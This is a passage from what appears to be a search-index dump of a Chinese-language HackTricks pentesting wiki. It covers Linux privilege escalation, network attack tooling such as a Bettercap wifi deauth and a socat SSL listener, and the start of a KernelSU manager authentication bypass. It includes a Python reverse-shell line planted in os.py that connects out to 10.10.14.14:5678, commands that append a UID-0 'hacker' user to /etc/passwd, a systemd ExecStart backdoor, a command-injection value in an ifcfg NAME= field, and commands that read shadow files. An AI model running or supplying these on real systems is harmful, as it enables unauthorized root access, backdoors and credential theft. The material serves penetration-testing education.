values"},"1461":{"body":"指定是否允许 root 使用 ssh 登录,默认是 prohibit-password(OpenSSH 7.0 起;更早版本默认为 yes)。可能的取值: yes: root 可使用密码和私钥登录 without-password or prohibit-password: root 只能使用私钥登录 forced-commands-only: root 只能使用带有 command= 选项的公钥登录,即只能执行该强制命令 no:不允许","breadcrumbs":"Linux Privilege Escalation » PermitRootLogin","id":"1461","title":"PermitRootLogin"},"1462":{"body":"指定包含可用于用户认证的公钥的文件。它可以包含像 %h 这样的标记,%h 会被替换为主目录。 你可以指定绝对路径 (以 / 开头)或 相对于用户主目录的相对路径 。例如: bash AuthorizedKeysFile .ssh/authorized_keys access That configuration will indicate that if you try to login with the private key of the user \\" testusername \\" ssh is going to compare the public key of your key with the ones located in /home/testusername/.ssh/authorized_keys and /home/testusername/access","breadcrumbs":"Linux Privilege Escalation » AuthorizedKeysFile","id":"1462","title":"AuthorizedKeysFile"},"1463":{"body":"SSH agent forwarding 允许你 use your local SSH keys instead of leaving keys (不要把没有 passphrases 的 keys 放在你的服务器上)。因此,你可以通过 ssh jump to a host ,然后从那里 jump to another host, using 存放在你 initial host 上的 key 。 You need to set this option in $HOME/.ssh/config like 
this: Host example.com\\nForwardAgent yes 注意,如果 Host 是 *,每次用户跳转到不同的机器时,该主机都将能够访问密钥(这是一个安全问题)。 客户端全局配置文件 /etc/ssh/ssh_config 可以 覆盖 这些 选项 并允许或拒绝此配置。 服务端配置文件 /etc/ssh/sshd_config 可以使用关键字 AllowAgentForwarding 允许 或 拒绝 ssh-agent 转发(默认允许)。 如果你发现环境中配置了 Forward Agent,请阅读以下页面,因为 你可能能够滥用它以提升权限 : SSH Forward Agent exploitation","breadcrumbs":"Linux Privilege Escalation » ForwardAgent/AllowAgentForwarding","id":"1463","title":"ForwardAgent/AllowAgentForwarding"},"1464":{"body":"","breadcrumbs":"Linux Privilege Escalation » 有趣的文件","id":"1464","title":"有趣的文件"},"1465":{"body":"文件 /etc/profile 和 /etc/profile.d/ 下的文件是 当用户启动登录 shell 时执行的脚本 (/etc/profile 会加载 /etc/profile.d/*.sh;非登录的交互式 shell 通常不会读取它们)。因此,如果你可以 写入或修改其中的任何一个,就可以在下一个登录用户(包括 root)的上下文中执行代码,从而提升权限 。 bash ls -l /etc/profile /etc/profile.d/ 如果发现任何异常的 profile 脚本,应检查其中是否包含 敏感信息 。","breadcrumbs":"Linux Privilege Escalation » Profiles 文件","id":"1465","title":"Profiles 文件"},"1466":{"body":"根据操作系统,/etc/passwd 和 /etc/shadow 文件可能使用不同的名称,或存在备份。因此建议 查找所有此类文件 并 检查是否可读取 ,以查看文件中 是否包含哈希 : bash #Passwd equivalent files\\ncat /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null\\n#Shadow equivalent files\\ncat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db /etc/security/opasswd 2>/dev/null 在某些情况下,你可以在 /etc/passwd(或等效)文件中找到 password hashes bash grep -v \'^[^:]*:[x\\\\*]\' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null","breadcrumbs":"Linux Privilege Escalation » Passwd/Shadow 文件","id":"1466","title":"Passwd/Shadow 文件"},"1467":{"body":"首先,使用以下任一命令生成一个口令哈希(三条命令生成的都是口令 hacker 的哈希,格式分别为 MD5-crypt、SHA-512-crypt 和 SHA-512-crypt)。 openssl passwd -1 -salt hacker hacker\\nmkpasswd -m SHA-512 hacker\\npython2 -c \'import crypt; print crypt.crypt(\\"hacker\\", \\"$6$salt\\")\'","breadcrumbs":"Linux Privilege Escalation » 可写的 /etc/passwd","id":"1467","title":"可写的 /etc/passwd"},"1468":{"body":"本节介绍在 Linux 系统中进行 Privilege Escalation 的常见方法、枚举技巧和防御建议。仅在获得授权的 pentesting、红队或审计环境中使用这些技术。","breadcrumbs":"Linux Privilege Escalation » Privilege Escalation","id":"1468","title":"Privilege Escalation"},"1469":{"body":"从基础做起:检查 kernel 版本、内核漏洞、已加载的模块、内核配置以及 
dmesg 输出。 用户和权限:查看 /etc/passwd、/etc/shadow(若可读)、sudoers、组信息以及 home 目录权限。 服务和进程:枚举正在运行的服务、crontab、systemd 单元以及具有高权限的进程句柄。 文件和二进制:查找 SUID/SGID 文件、可写的脚本或配置文件、可利用的 PATH 问题。 Capability 与 namespaces:检查 file capabilities、setcap 输出以及不安全的 namespace 配置。 第三方工具与资源:使用 LinPEAS、GTFOBins、sudo -l 等工具和技巧来加速枚举过程。","breadcrumbs":"Linux Privilege Escalation » 常见枚举步骤","id":"1469","title":"常见枚举步骤"},"147":{"body":"生成密钥和自签名证书 FILENAME=server\\n# Generate a public/private key pair:\\nopenssl genrsa -out $FILENAME.key 1024\\n# Generate a self signed certificate:\\nopenssl req -new -key $FILENAME.key -x509 -sha256 -days 3653 -out $FILENAME.crt\\n# Generate the PEM file by just appending the key and certificate files:\\ncat $FILENAME.key $FILENAME.crt >$FILENAME.pem 使用证书进行监听 sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0 - 使用证书监听并重定向到主机 sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0 openssl-connect:[SERVER]:[PORT],verify=0 有时,如果客户端检查 CA 是否为有效的,你可以 serve a certificate of other hostname signed by a CA . 
另一个有趣的测试,是提供一个 certificate of the requested hostname but self-signed 。 其他要测试的情况包括尝试用一个虽然是 valid certificate 但并非有效 CA 的 certificate 来签名。或者使用有效的 public key,强制使用像 diffie hellman 这样的算法(这种算法不需要用真实的 private key 去解密任何东西),当客户端请求对真实 private key 的 probe(比如 hash)时,发送一个假的 probe,并期望客户端不会去检查它。","breadcrumbs":"Pentesting Network » TCP + SSL 在端口上监听","id":"147","title":"TCP + SSL 在端口上监听"},"1470":{"body":"SUID/SGID 可执行文件滥用(SUID) 错误配置的 sudo 权限(sudo) 可写的 cron 脚本或 systemd 单元 易受攻击的服务或守护进程(如使用高权限运行) 可利用的 kernel exploits(仅在受控环境下测试) 凭证泄露(如配置文件或历史记录中的明文密码或 SSH 密钥)","breadcrumbs":"Linux Privilege Escalation » 常见漏洞类别(示例)","id":"1470","title":"常见漏洞类别(示例)"},"1471":{"body":"及时打补丁并更新内核与关键组件。 最小权限原则:限制 sudoers 和服务运行权限。 移除不必要的 SUID 二进制并最小化 setcap 的使用。 加强日志和审计,检测异常的提权行为和命令执行。 对关键目录和配置文件设置严格的权限控制并加密敏感凭证。","breadcrumbs":"Linux Privilege Escalation » 防御建议","id":"1471","title":"防御建议"},"1472":{"body":"注意:下面的 useradd / chpasswd / chage 命令本身需要已经拥有 root 权限,只适合在授权环境中搭建测试账户,并不是提权步骤。 sudo useradd -m -s /bin/bash hacker\\necho \'hacker:S3cure!8kLm#V2qR\' | sudo chpasswd\\nsudo chage -d 0 hacker (其中 S3cure!8kLm#V2qR 只是一个示例口令) 真正的提权方式是:如果 /etc/passwd 可写,就追加一行 UID 为 0 的用户记录,第二个字段填入上一步生成的哈希: hacker:GENERATED_PASSWORD_HERE:0:0:Hacker:/root:/bin/bash 例如: hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash 你现在可以使用 su 命令并使用 hacker:hacker(上面的哈希对应的口令就是 hacker) 或者,你可以使用以下行添加一个没有密码的虚拟用户。 警告:这可能会降低机器当前的安全性;此外能否以空口令登录取决于 PAM 配置(pam_unix 需要 nullok),在部分系统上会被拒绝。 echo \'dummy::0:0::/root:/bin/bash\' >>/etc/passwd\\nsu - dummy 注意:在 BSD 平台上 /etc/passwd 位于 /etc/pwd.db 和 /etc/master.passwd,同时 /etc/shadow 被重命名为 /etc/spwd.db。 你应该检查是否可以 写入一些敏感文件 。例如,你能否写入某些 服务配置文件 ? 
bash find / \'(\' -type f -or -type d \')\' \'(\' \'(\' -user $USER \')\' -or \'(\' -perm -o=w \')\' \')\' 2>/dev/null | grep -v \'/proc/\' | grep -v $HOME | sort | uniq #Find files owned by the user or writable by anybody\\nfor g in `groups`; do find \\\\( -type f -or -type d \\\\) -group $g -perm -g=w 2>/dev/null | grep -v \'/proc/\' | grep -v $HOME; done #Find files writable by any group of the user 例如,如果机器正在运行 tomcat 服务器,并且你可以 modify the Tomcat service configuration file inside /etc/systemd/, 那么你可以修改以下几行: ExecStart=/path/to/backdoor\\nUser=root\\nGroup=root 你的 backdoor 将在下次 tomcat 启动时被执行。注意:systemd 只有在执行 daemon-reload 或系统重启后才会重新读取被修改的 unit 文件(单纯 restart 仍会使用旧定义并给出警告),因此通常要等待机器重启或管理员重新加载后该服务再次启动。","breadcrumbs":"Linux Privilege Escalation » 添加用户 hacker 并设置生成的密码","id":"1472","title":"添加用户 hacker 并设置生成的密码"},"1473":{"body":"以下文件夹可能包含备份或有趣的信息: /tmp , /var/tmp , /var/backups, /var/mail, /var/spool/mail, /etc/exports, /root (最后一个可能无法读取,但试试看) bash ls -a /tmp /var/tmp /var/backups /var/mail/ /var/spool/mail/ /root","breadcrumbs":"Linux Privilege Escalation » 检查文件夹","id":"1473","title":"检查文件夹"},"1474":{"body":"bash #root owned files in /home folders\\nfind /home -user root 2>/dev/null\\n#Files owned by other users in folders owned by me\\nfor d in `find /var /etc /home /root /tmp /usr /opt /boot /sys -type d -user $(whoami) 2>/dev/null`; do find $d ! -user `whoami` -exec ls -l {} \\\\; 2>/dev/null; done\\n#Files owned by root, readable by me but not world readable\\nfind / -type f -user root ! -perm -o=r 2>/dev/null\\n#Files owned by me or world writable\\nfind / \'(\' -type f -or -type d \')\' \'(\' \'(\' -user $USER \')\' -or \'(\' -perm -o=w \')\' \')\' ! -path \\"/proc/*\\" ! -path \\"/sys/*\\" ! -path \\"$HOME/*\\" 2>/dev/null\\n#Writable files by each group I belong to\\nfor g in `groups`;\\ndo printf \\" Group $g:\\\\n\\";\\nfind / \'(\' -type f -or -type d \')\' -group $g -perm -g=w ! -path \\"/proc/*\\" ! -path \\"/sys/*\\" ! 
-path \\"$HOME/*\\" 2>/dev/null\\ndone\\ndone","breadcrumbs":"Linux Privilege Escalation » 奇怪的位置/Owned 文件","id":"1474","title":"奇怪的位置/Owned 文件"},"1475":{"body":"bash find / -type f -mmin -5 ! -path \\"/proc/*\\" ! -path \\"/sys/*\\" ! -path \\"/run/*\\" ! -path \\"/dev/*\\" ! -path \\"/var/lib/*\\" 2>/dev/null","breadcrumbs":"Linux Privilege Escalation » 最近几分钟修改的文件","id":"1475","title":"最近几分钟修改的文件"},"1476":{"body":"bash find / -name \'*.db\' -o -name \'*.sqlite\' -o -name \'*.sqlite3\' 2>/dev/null","breadcrumbs":"Linux Privilege Escalation » Sqlite 数据库文件","id":"1476","title":"Sqlite 数据库文件"},"1477":{"body":"bash find / -type f \\\\( -name \\"*_history\\" -o -name \\".sudo_as_admin_successful\\" -o -name \\".profile\\" -o -name \\"*bashrc\\" -o -name \\"httpd.conf\\" -o -name \\"*.plan\\" -o -name \\".htpasswd\\" -o -name \\".git-credentials\\" -o -name \\"*.rhosts\\" -o -name \\"hosts.equiv\\" -o -name \\"Dockerfile\\" -o -name \\"docker-compose.yml\\" \\\\) 2>/dev/null","breadcrumbs":"Linux Privilege Escalation » *_history, .sudo_as_admin_successful, profile, bashrc, httpd.conf, .plan, .htpasswd, .git-credentials, .rhosts, hosts.equiv, Dockerfile, docker-compose.yml 文件","id":"1477","title":"*_history, .sudo_as_admin_successful, profile, bashrc, httpd.conf, .plan, .htpasswd, .git-credentials, .rhosts, hosts.equiv, Dockerfile, docker-compose.yml 文件"},"1478":{"body":"bash find / -type f -iname \\".*\\" -ls 2>/dev/null","breadcrumbs":"Linux Privilege Escalation » 隐藏文件","id":"1478","title":"隐藏文件"},"1479":{"body":"bash for d in `echo $PATH | tr \\":\\" \\"\\\\n\\"`; do find $d -name \\"*.sh\\" 2>/dev/null; done\\nfor d in `echo $PATH | tr \\":\\" \\"\\\\n\\"`; do find $d -type f -executable 2>/dev/null; done","breadcrumbs":"Linux Privilege Escalation » PATH 中的脚本/二进制文件","id":"1479","title":"PATH 中的脚本/二进制文件"},"148":{"body":"bash # Events\\nevents.stream off #Stop showing events\\nevents.show #Show all events\\nevents.show 5 #Show latests 5 events\\nevents.clear # Ticker 
(loop of commands)\\nset ticker.period 5; set ticker.commands \\"wifi.deauth DE:AD:BE:EF:DE:AD\\"; ticker on # Caplets\\ncaplets.show\\ncaplets.update # Wifi\\nwifi.recon on\\nwifi.deauth BSSID\\nwifi.show\\n# Fake wifi\\nset wifi.ap.ssid Banana\\nset wifi.ap.bssid DE:AD:BE:EF:DE:AD\\nset wifi.ap.channel 5\\nset wifi.ap.encryption false #If true, WPA2\\nwifi.recon on; wifi.ap","breadcrumbs":"Pentesting Network » Bettercap","id":"148","title":"Bettercap"},"1480":{"body":"bash ls -alhR /var/www/ 2>/dev/null\\nls -alhR /srv/www/htdocs/ 2>/dev/null\\nls -alhR /usr/local/www/apache22/data/\\nls -alhR /opt/lampp/htdocs/ 2>/dev/null","breadcrumbs":"Linux Privilege Escalation » Web 文件","id":"1480","title":"Web 文件"},"1481":{"body":"bash find /var /etc /bin /sbin /home /usr/local/bin /usr/local/sbin /usr/bin /usr/games /usr/sbin /root /tmp -type f \\\\( -name \\"*backup*\\" -o -name \\"*\\\\.bak\\" -o -name \\"*\\\\.bck\\" -o -name \\"*\\\\.bk\\" \\\\) 2>/dev/null","breadcrumbs":"Linux Privilege Escalation » 备份","id":"1481","title":"备份"},"1482":{"body":"阅读 linPEAS 的代码,它会搜索 可能包含密码的若干文件 。 另一个有趣的工具 是: LaZagne ,它是一个开源程序,用来检索存储在本地计算机上的大量密码,适用于 Windows, Linux & Mac.","breadcrumbs":"Linux Privilege Escalation » 已知包含密码的文件","id":"1482","title":"已知包含密码的文件"},"1483":{"body":"如果你能够读取日志,你可能会在其中发现 有趣/机密的信息 。日志越异常,可能就越有价值(大概)。 此外,一些“ 不当 ”配置(带后门?)的 审计日志 可能允许你在审计日志中 记录密码 ,正如这篇文章所解释的: https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/ . 
bash aureport --tty | grep -E \\"su |sudo \\" | sed -E \\"s,su|sudo,${C}[1;31m&${C}[0m,g\\"\\ngrep -RE \'comm=\\"su\\"|comm=\\"sudo\\"\' /var/log* 2>/dev/null 属于 adm 组会非常有帮助,因为该组通常可以读取 /var/log 下的大多数日志。","breadcrumbs":"Linux Privilege Escalation » 日志","id":"1483","title":"日志"},"1484":{"body":"bash ~/.bash_profile # if it exists, read it once when you log in to the shell\\n~/.bash_login # if it exists, read it once if .bash_profile doesn\'t exist\\n~/.profile # if it exists, read once if the two above don\'t exist\\n/etc/profile # read by every login shell, before the three per-user files above\\n~/.bashrc # if it exists, read it every time you start a new shell\\n~/.bash_logout # if it exists, read when the login shell exits\\n~/.zlogin #zsh shell\\n~/.zshrc #zsh shell","breadcrumbs":"Linux Privilege Escalation » Shell files","id":"1484","title":"Shell files"},"1485":{"body":"你还应该检查文件名或文件内容中包含单词 \\" password \\" 的文件,也要在 logs 中检查 IPs 和 emails,或 hashes regexps。 我不会在这里列出如何完成所有这些检查,但如果你感兴趣,可以查看 linpeas 执行的最后几项检查。","breadcrumbs":"Linux Privilege Escalation » Generic Creds Search/Regex","id":"1485","title":"Generic Creds Search/Regex"},"1486":{"body":"","breadcrumbs":"Linux Privilege Escalation » 可写文件","id":"1486","title":"可写文件"},"1487":{"body":"如果你知道 python 脚本将从 哪个位置 被执行,并且你 可以在该文件夹中写入 或者你可以 修改 python libraries ,你就可以修改 OS library 并为其植入 backdoor(如果你能写入 python 脚本将被执行的位置,复制并粘贴 os.py library;脚本所在目录在 sys.path 中排在标准库之前,因此同名模块会被优先导入)。 要 backdoor the library ,只需在 os.py library 的末尾添加以下行(change IP and PORT): python import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\"10.10.14.14\\",5678));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\"/bin/sh\\",\\"-i\\"]);","breadcrumbs":"Linux Privilege Escalation » Python library hijacking","id":"1487","title":"Python library hijacking"},"1488":{"body":"logrotate 中的一个漏洞允许对日志文件或其父目录具有 write permissions 的用户可能获得提权。因为 logrotate 通常以 root 运行,可能被操纵去执行任意文件,尤其是在像 /etc/bash_completion.d/ 这样的目录中。重要的是不仅检查 /var/log 中的权限,还要检查任何应用了日志轮换的目录。 tip 该漏洞影响 logrotate 版本 
3.18.0 及更早版本 关于该漏洞的更多详细信息见此页面: https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition . 你可以使用 logrotten 来利用此漏洞。 该漏洞与 CVE-2016-1247 (nginx logs) 非常相似,所以每当你发现可以修改日志时,检查谁在管理这些日志,并检查是否可以通过将日志替换为 symlinks 来提权。","breadcrumbs":"Linux Privilege Escalation » Logrotate exploitation","id":"1488","title":"Logrotate exploitation"},"1489":{"body":"Vulnerability reference: https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f 如果由于任何原因,某用户能够在 /etc/sysconfig/network-scripts 中 write 一个 ifcfg- 脚本,或者能够 adjust 一个已有的脚本,那么你的 system is pwned 。 Network scripts,例如 ifcfg-eth0 ,用于网络连接。它们看起来完全像 .INI 文件。然而,它们在 Linux 上被 Network Manager (dispatcher.d) 以 source 的方式当作 shell 脚本执行。 在我的案例中,这些 network scripts 中的 NAME= 属性处理不正确。如果名称中有 white/blank space the system tries to execute the part after the white/blank space 。这意味着 everything after the first blank space is executed as root 。 For example: /etc/sysconfig/network-scripts/ifcfg-1337 bash NAME=Network /bin/id\\nONBOOT=yes\\nDEVICE=eth0 ( 注意 Network 与 /bin/id 之间的空格 )","breadcrumbs":"Linux Privilege Escalation » /etc/sysconfig/network-scripts/ (Centos/Redhat)","id":"1489","title":"/etc/sysconfig/network-scripts/ (Centos/Redhat)"},"149":{"body":"Take into account that when a UDP packet is sent to a device that does not have the requested port open, an ICMP (Port Unreachable) is sent back.","breadcrumbs":"Pentesting Network » 主动发现说明","id":"149","title":"主动发现说明"},"1490":{"body":"目录 /etc/init.d 存放用于 System V init (SysVinit) 的 脚本 ,这是 经典的 Linux 服务管理系统 。其中包含用于 start、stop、restart,有时还有 reload 服务的脚本。这些脚本可以直接执行,或通过位于 /etc/rc?.d/ 的符号链接来触发。在 Redhat 系统中,另一条常见路径是 /etc/rc.d/init.d。 另一方面,/etc/init 与 Upstart 相关,这是由 Ubuntu 引入的较新的 service management 方式,使用配置文件来管理服务。尽管很多系统已迁移到 Upstart,但由于 Upstart 中具有兼容层,SysVinit 脚本仍会与 Upstart 配置一起被使用。 systemd 是一种现代的初始化与服务管理器,提供了按需启动守护进程、自动挂载管理以及系统状态快照等高级功能。它将文件组织为分发包使用的 /usr/lib/systemd/,以及供管理员修改的 /etc/systemd/system/,从而简化了系统管理。","breadcrumbs":"Linux Privilege Escalation » init、init.d、systemd 和 
rc.d","id":"1490","title":"init、init.d、systemd 和 rc.d"},"1491":{"body":"","breadcrumbs":"Linux Privilege Escalation » Other Tricks","id":"1491","title":"Other Tricks"},"1492":{"body":"NFS no_root_squash/no_all_squash misconfiguration PE","breadcrumbs":"Linux Privilege Escalation » NFS Privilege escalation","id":"1492","title":"NFS Privilege escalation"},"1493":{"body":"Escaping from Jails","breadcrumbs":"Linux Privilege Escalation » Escaping from restricted Shells","id":"1493","title":"Escaping from restricted Shells"},"1494":{"body":"Cisco - vmanage","breadcrumbs":"Linux Privilege Escalation » Cisco - vmanage","id":"1494","title":"Cisco - vmanage"},"1495":{"body":"Android rooting frameworks commonly hook a syscall to expose privileged kernel functionality to a userspace manager. Weak manager authentication (e.g., signature checks based on FD-order or poor password schemes) can enable a local app to impersonate the manager and escalate to root on already-rooted devices. Learn more and exploitation details here: Android Rooting Frameworks Manager Auth Bypass Syscall Hook","breadcrumbs":"Linux Privilege Escalation » Android rooting frameworks: manager-channel abuse","id":"1495","title":"Android rooting frameworks: manager-channel abuse"},"1496":{"body":"https://github.com/a13xp0p0v/kconfig-hardened-check https://github.com/a13xp0p0v/linux-kernel-defence-map","breadcrumbs":"Linux Privilege Escalation » Kernel Security Protections","id":"1496","title":"Kernel Security Protections"},"1497":{"body":"Static impacket binaries","breadcrumbs":"Linux Privilege Escalation » More help","id":"1497","title":"More help"},"1498":{"body":"","breadcrumbs":"Linux Privilege Escalation » Linux/Unix Privesc Tools","id":"1498","title":"Linux/Unix Privesc Tools"},"1499":{"body":"LinEnum : https://github.com/rebootuser/LinEnum (-t option) Enumy : https://github.com/luke-goddard/enumy Unix Privesc Check: http://pentestmonkey.net/tools/audit/unix-privesc-check Linux Priv Checker: 
www.securitysift.com/download/linuxprivchecker.py BeRoot: https://github.com/AlessandroZ/BeRoot/tree/master/Linux Kernelpop: Enumerate kernel vulns in Linux and macOS https://github.com/spencerdodd/kernelpop Metasploit: multi/recon/local_exploit_suggester Linux Exploit Suggester: https://github.com/mzet-/linux-exploit-suggester EvilAbigail (physical access): https://github.com/GDSSecurity/EvilAbigail Compilation of more scripts : https://github.com/1N3/PrivEsc","breadcrumbs":"Linux Privilege Escalation » Best tool to look for Linux local privilege escalation vectors: LinPEAS","id":"1499","title":"Best tool to look for Linux local privilege escalation vectors: LinPEAS"},"15":{"body":"请查看: HackTricks Values & FAQ","breadcrumbs":"HackTricks » 许可证和免责声明","id":"15","title":"许可证和免责声明"},"150":{"body":"ARP 包用于发现网络中正在使用的 IP。主机必须对每个可能的 IP 地址发送请求,只有正在使用的地址才会响应。","breadcrumbs":"Pentesting Network » ARP discover","id":"150","title":"ARP discover"},"1500":{"body":"https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ https://payatu.com/guide-linux-privilege-escalation/ https://pen-testing.sans.org/resources/papers/gcih/attack-defend-linux-privilege-escalation-techniques-2016-152744 http://0x90909090.blogspot.com/2015/07/no-one-expect-command-execution.html https://touhidshaikh.com/blog/?p=827 https://github.com/sagishahar/lpeworkshop/blob/master/Lab%20Exercises%20Walkthrough%20-%20Linux.pdf https://github.com/frizb/Linux-Privilege-Escalation https://github.com/lucyoa/kernel-exploits https://github.com/rtcrowley/linux-private-i https://www.linux.com/news/what-socket/ https://muzec0318.github.io/posts/PG/peppo.html https://www.linuxjournal.com/article/7744 https://blog.certcube.com/suid-executables-linux-privilege-escalation/ https://juggernaut-sec.com/sudo-part-2-lpe https://linuxconfig.org/how-to-manage-acls-on-linux https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f 
https://www.linode.com/docs/guides/what-is-systemd/ 0xdf – HTB Eureka (bash arithmetic injection via logs, overall chain) GNU Bash Manual – BASH_ENV (non-interactive startup file) 0xdf – HTB Environment (sudo env_keep BASH_ENV → root) tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » References","id":"1500","title":"References"},"1501":{"body":"Reading time: 13 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 像 KernelSU、APatch、SKRoot 和 Magisk 这样的 Rooting 框架经常会修补 Linux/Android 内核,并通过挂钩的系统调用向特权用户空间“管理”应用程序暴露特权功能。如果管理身份验证步骤存在缺陷,任何本地应用程序都可以访问此通道,并在已经获得 root 权限的设备上提升特权。 本页抽象了公共研究中发现的技术和陷阱(特别是 Zimperium 对 KernelSU v0.5.7 的分析),以帮助红队和蓝队理解攻击面、利用原语和稳健的缓解措施。","breadcrumbs":"Linux Privilege Escalation » Android Rooting Frameworks Manager Auth Bypass Syscall Hook » Android Rooting Frameworks (KernelSU/Magisk) Manager Auth Bypass & Syscall Hook Abuse","id":"1501","title":"Android Rooting Frameworks (KernelSU/Magisk) Manager Auth Bypass & Syscall Hook Abuse"},"1502":{"body":"内核模块/补丁挂钩一个系统调用(通常是 prctl)以接收来自用户空间的“命令”。 协议通常是:magic_value, command_id, arg_ptr/len ... 
用户空间管理应用程序首先进行身份验证(例如,CMD_BECOME_MANAGER)。一旦内核将调用者标记为受信任的管理者,就会接受特权命令: 授予调用者 root 权限(例如,CMD_GRANT_ROOT) 管理 su 的允许列表/拒绝列表 调整 SELinux 策略(例如,CMD_SET_SEPOLICY) 查询版本/配置 由于任何应用程序都可以调用系统调用,因此管理身份验证的正确性至关重要。 示例(KernelSU 设计): 挂钩的系统调用:prctl 转发到 KernelSU 处理程序的魔法值:0xDEADBEEF 命令包括:CMD_BECOME_MANAGER, CMD_GET_VERSION, CMD_ALLOW_SU, CMD_SET_SEPOLICY, CMD_GRANT_ROOT 等。","breadcrumbs":"Linux Privilege Escalation » Android Rooting Frameworks Manager Auth Bypass Syscall Hook » 架构模式:挂钩的系统调用管理通道","id":"1502","title":"架构模式:挂钩的系统调用管理通道"},"1503":{"body":"当用户空间调用 prctl(0xDEADBEEF, CMD_BECOME_MANAGER, data_dir_path, ...) 时,KernelSU 验证: 路径前缀检查 提供的路径必须以调用者 UID 的预期前缀开头,例如 /data/data/ 或 /data/user//。 参考:core_hook.c (v0.5.7) 路径前缀逻辑。 所有权检查 路径必须由调用者 UID 拥有。 参考:core_hook.c (v0.5.7) 所有权逻辑。 通过 FD 表扫描进行 APK 签名检查 遍历调用进程的打开文件描述符(FD)。 选择第一个路径匹配 /data/app/*/base.apk 的文件。 解析 APK v2 签名并与官方管理证书进行验证。 参考:manager.c(遍历 FDs),apk_sign.c(APK v2 验证)。 如果所有检查都通过,内核会暂时缓存管理者的 UID,并接受来自该 UID 的特权命令,直到重置。","breadcrumbs":"Linux Privilege Escalation » Android Rooting Frameworks Manager Auth Bypass Syscall Hook » KernelSU v0.5.7 身份验证流程(如实现)","id":"1503","title":"KernelSU v0.5.7 身份验证流程(如实现)"},"1504":{"body":"如果签名检查绑定到在进程 FD 表中找到的“第一个匹配的 /data/app/*/base.apk”,则实际上并没有验证调用者自己的包。攻击者可以预先放置一个合法签名的 APK(真正的管理者的),使其在 FD 列表中比他们自己的 base.apk 更早出现。 这种间接信任使得一个非特权应用程序可以在没有拥有管理者签名密钥的情况下冒充管理者。 利用的关键属性: FD 扫描并不绑定到调用者的包身份;它仅仅是模式匹配路径字符串。 open() 返回最低可用的 FD。通过首先关闭低编号的 FD,攻击者可以控制顺序。 过滤器仅检查路径是否匹配 /data/app/*/base.apk,而不是它是否对应于调用者的已安装包。","breadcrumbs":"Linux Privilege Escalation » Android Rooting Frameworks Manager Auth Bypass Syscall Hook » 漏洞类别:信任“第一个匹配的 APK”来自 FD 迭代","id":"1504","title":"漏洞类别:信任“第一个匹配的 APK”来自 FD 迭代"},"1505":{"body":"设备已经被一个易受攻击的 Rooting 框架(例如,KernelSU v0.5.7)获得 root 权限。 攻击者可以在本地运行任意非特权代码(Android 应用程序进程)。 真实的管理者尚未进行身份验证(例如,在重启后)。一些框架在成功后缓存管理者 UID;你必须赢得这场竞赛。","breadcrumbs":"Linux Privilege Escalation » Android Rooting Frameworks Manager Auth Bypass Syscall Hook » 攻击前提条件","id":"1505","title":"攻击前提条件"},"1506":{"body":"高层步骤: 
构建一个有效的路径到你自己的应用数据目录,以满足前缀和所有权检查。 确保一个真实的 KernelSU 管理者 base.apk 在一个低编号的 FD 上打开,低于你自己的 base.apk。 调用 prctl(0xDEADBEEF, CMD_BECOME_MANAGER, , ...) 以通过检查。 发出特权命令,如 CMD_GRANT_ROOT, CMD_ALLOW_SU, CMD_SET_SEPOLICY 以保持提升。 关于步骤 2(FD 排序)的实用说明: 通过遍历 /proc/self/fd 符号链接来识别你自己 /data/app/*/base.apk 的进程 FD。 关闭一个低 FD(例如,stdin,fd 0),并首先打开合法的管理 APK,以便它占据 fd 0(或任何低于你自己 base.apk fd 的索引)。 将合法的管理 APK 与你的应用捆绑,以便其路径满足内核的简单过滤器。例如,将其放在匹配 /data/app/*/base.apk 的子路径下。 示例代码片段(Android/Linux,仅供说明): 枚举打开的 FDs 以定位 base.apk 条目: c #include \\n#include \\n#include \\n#include int find_first_baseapk_fd(char out_path[PATH_MAX]) {\\nDIR *d = opendir(\\"/proc/self/fd\\");\\nif (!d) return -1;\\nstruct dirent *e; char link[PATH_MAX]; char p[PATH_MAX];\\nint best_fd = -1;\\nwhile ((e = readdir(d))) {\\nif (e->d_name[0] == \'.\') continue;\\nint fd = atoi(e->d_name);\\nsnprintf(link, sizeof(link), \\"/proc/self/fd/%d\\", fd);\\nssize_t n = readlink(link, p, sizeof(p)-1);\\nif (n <= 0) continue; p[n] = \'\\\\0\';\\nif (strstr(p, \\"/data/app/\\") && strstr(p, \\"/base.apk\\")) {\\nif (best_fd < 0 || fd < best_fd) {\\nbest_fd = fd; strncpy(out_path, p, PATH_MAX);\\n}\\n}\\n}\\nclosedir(d);\\nreturn best_fd; // First 